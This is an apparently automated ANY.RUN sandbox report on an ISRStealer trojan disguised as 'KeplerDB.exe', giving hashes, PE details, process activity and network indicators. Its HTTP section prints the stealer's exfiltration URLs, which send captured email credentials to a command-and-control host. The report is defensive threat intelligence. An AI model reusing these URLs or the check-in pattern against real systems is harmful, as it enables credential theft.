analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d5f5605ad89e67658c1d6493379c2328b782d5754cd52c61f5868753a23f.exe

Full analysis: https://app.any.run/tasks/3da5d1d4-c844-4a6d-bb90-e09064999de8
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: May 24, 2019, 16:23:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
stealer
trojan
isrstealer
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

1C28877A1EDA1714033692B49274B724

SHA1:

A92E38DBC3C219FF20A7ABC93E5AE6DA2ED1BA18

SHA256:

D5F5605AD89E67658C1D6493379C2328B782D5754CD52C61F5868753A23F782C

SSDEEP:

6144:E4+YPWChjgdTZkIGNlz7p5zdCi4zmc9LRbbNxMSLQzlCh8WVHQ1vFH78ImZWRhmI:nuy03Ud5ZCi4rHFLWAVi78oRhakJcp1x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to CnC server

      • vbc.exe (PID: 2512)
    • ISRSTEALER was detected

      • vbc.exe (PID: 2512)
    • Stealing of credential data

      • vbc.exe (PID: 3292)
      • vbc.exe (PID: 2416)
    • Actions looks like stealing of personal data

      • vbc.exe (PID: 3292)
      • vbc.exe (PID: 2512)
      • vbc.exe (PID: 2416)
    • Sending of credential data detected

      • vbc.exe (PID: 2512)
  • SUSPICIOUS

    • Executes scripts

      • vbc.exe (PID: 2512)
      • d5f5605ad89e67658c1d6493379c2328b782d5754cd52c61f5868753a23f.exe (PID: 3532)
    • Application launched itself

      • vbc.exe (PID: 2512)
    • Creates files in the user directory

      • vbc.exe (PID: 2512)
    • Loads DLL from Mozilla Firefox

      • vbc.exe (PID: 3292)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (81)
.dll | Win32 Dynamic Link Library (generic) (7.2)
.exe | Win32 Executable (generic) (4.9)
.exe | Win16/32 Executable Delphi generic (2.2)
.exe | Generic Win/DOS Executable (2.2)

EXIF

EXE

AssemblyVersion: 1.0.0.0
ProductVersion: 1.0.0.0
ProductName: KeplerDB
OriginalFileName: KeplerDB.exe
LegalTrademarks: -
LegalCopyright: Copyright KeplerDB 2017
InternalName: KeplerDB.exe
FileVersion: 1.0.0.0
FileDescription: KeplerDB
CompanyName: -
Comments: -
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x6105e
UninitializedDataSize: -
InitializedDataSize: 2048
CodeSize: 389632
LinkerVersion: 48
PEType: PE32
TimeStamp: 2017:12:03 00:20:48+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 02-Dec-2017 23:20:48
Comments: -
CompanyName: -
FileDescription: KeplerDB
FileVersion: 1.0.0.0
InternalName: KeplerDB.exe
LegalCopyright: Copyright KeplerDB 2017
LegalTrademarks: -
OriginalFilename: KeplerDB.exe
ProductName: KeplerDB
ProductVersion: 1.0.0.0
Assembly Version: 1.0.0.0

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 02-Dec-2017 23:20:48
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00002000
0x0005F064
0x0005F200
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
7.96901
.rsrc
0x00062000
0x000005B8
0x00000600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.08968
.reloc
0x00064000
0x0000000C
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
0.10191

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.00112
490
UNKNOWN
UNKNOWN
RT_MANIFEST

Imports

mscoree.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start d5f5605ad89e67658c1d6493379c2328b782d5754cd52c61f5868753a23f.exe no specs #ISRSTEALER vbc.exe vbc.exe vbc.exe

Process information

PID
CMD
Path
Indicators
Parent process
3532"C:\Users\admin\AppData\Local\Temp\d5f5605ad89e67658c1d6493379c2328b782d5754cd52c61f5868753a23f.exe" C:\Users\admin\AppData\Local\Temp\d5f5605ad89e67658c1d6493379c2328b782d5754cd52c61f5868753a23f.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
KeplerDB
Exit code:
0
Version:
1.0.0.0
2512"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
d5f5605ad89e67658c1d6493379c2328b782d5754cd52c61f5868753a23f.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
3292 /scomma "C:\Users\admin\AppData\Local\Temp\tAdp8Uo5IT.ini"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
vbc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
2416 /scomma "C:\Users\admin\AppData\Local\Temp\xb80Cdx6Yy.ini"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
vbc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
Total events
50
Read events
32
Write events
18
Delete events
0

Modification events

(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2512) vbc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vbc_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
0
Suspicious files
0
Text files
2
Unknown types
1

Dropped files

PID
Process
Filename
Type
3292vbc.exeC:\Users\admin\AppData\Local\Temp\tAdp8Uo5IT.initext
MD5:9B01EFFA9661664776E8A75B99029E7F
SHA256:28C44E981360500B26AFB363BBE8EA4354DE218D1A177092D9BDF37E20794021
2512vbc.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2416vbc.exeC:\Users\admin\AppData\Local\Temp\xb80Cdx6Yy.initext
MD5:694A49A611C108EB6D3E51D8A5494237
SHA256:B0FF9408736D6CA22B705CE872ABD00E48712634870236B82F91B2E0D09BAA78
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2512
vbc.exe
GET
200
185.104.29.82:80
http://u19982p14983.web0119.zxcs.nl/Alhaji/index.php?action=add&[email protected]&password=honeypass356&app=MS%20Outlook%202002/2003/2007&pcname=USER-PC&sitename=192.168.1.1
NL
malicious
2512
vbc.exe
GET
200
185.104.29.82:80
http://u19982p14983.web0119.zxcs.nl/Alhaji/index.php?action=add&[email protected]&password=honeypass356&app=Opera&pcname=USER-PC&sitename=https://www.facebook.com
NL
malicious
2512
vbc.exe
GET
200
185.104.29.82:80
http://u19982p14983.web0119.zxcs.nl/Alhaji/index.php?action=add&[email protected]&password=honeypass356&app=Chrome&pcname=USER-PC&sitename=https://m.facebook.com/
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2512
vbc.exe
185.104.29.82:80
u19982p14983.web0119.zxcs.nl
Stichting DIGI NL
NL
malicious

DNS requests

Domain
IP
Reputation
u19982p14983.web0119.zxcs.nl
  • 185.104.29.82
malicious

Threats

PID
Process
Class
Message
2512
vbc.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2512
vbc.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
2512
vbc.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2512
vbc.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
2512
vbc.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2512
vbc.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
No debug info